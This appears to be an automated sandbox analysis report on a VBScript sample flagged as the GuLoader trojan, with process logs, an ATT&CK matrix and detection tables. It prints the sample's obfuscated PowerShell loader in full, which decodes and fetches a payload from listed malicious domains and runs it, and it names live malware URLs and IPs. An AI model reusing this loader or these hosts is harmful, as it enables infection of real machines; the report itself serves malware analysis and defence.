      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5100Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4797Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000001.00000002.3005157693.00000273D31F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWY
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_7016.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7016, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information221
      Scripting      		Valid Accounts12
      Command and Scripting Interpreter      		221
      Scripting      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping1
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials12
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      mg.vbs34%ReversingLabsScript-WScript.Trojan.GuLoader

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.almrwad.com0%Avira URL Cloudsafe
      http://www.almrwad.com0%Avira URL Cloudsafe
      http://almrwad.com0%Avira URL Cloudsafe
      http://www.erp-royal-crown.info100%Avira URL Cloudphishing
      https://www.erp-royal-crown.info/wh/Subordinerendes78.smiX100%Avira URL Cloudphishing
      https://www.erp-royal-crown.info100%Avira URL Cloudphishing
      http://erp-royal-crown.info100%Avira URL Cloudphishing
      https://www.erp-royal-crown.info/wh/Subordinerendes78.smi100%Avira URL Cloudmalware
      https://www.almrwad.com/wh/Subordinerendes78.smi100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      erp-royal-crown.info
      		148.251.114.233
      		truefalse
        		unknown
        almrwad.com
        		184.171.244.231
        		truefalse
          		unknown
          www.almrwad.com
          		unknown
          		unknownfalse
            		unknown
            www.erp-royal-crown.info
            		unknown
            		unknownfalse
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://www.erp-royal-crown.info/wh/Subordinerendes78.smifalse
              • Avira URL Cloud: malware
              		unknown
              https://www.almrwad.com/wh/Subordinerendes78.smifalse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.3000440542.00000273CAE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
